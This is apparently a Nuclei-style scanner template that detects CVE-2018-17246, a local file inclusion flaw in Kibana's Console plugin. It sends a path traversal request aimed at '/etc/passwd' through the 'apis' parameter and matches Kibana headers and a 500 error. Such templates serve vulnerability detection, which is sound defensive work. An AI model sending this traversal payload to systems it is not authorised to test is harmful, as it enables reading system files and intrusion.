id: CVE-2018-17246
info:
  name: Kibana Local File Inclusion
  author: princechaddha
  severity: high
  description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
  reference: |
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17246
    - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
  tags: cve,cve2018,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "\"message\":\"An internal server error occurred\""
        part: body

      - type: word
        words:
          - "kbn-name"
          - "application/json"
          - "kibana"
        condition: and
        part: header
      - type: status
        status:
          - 500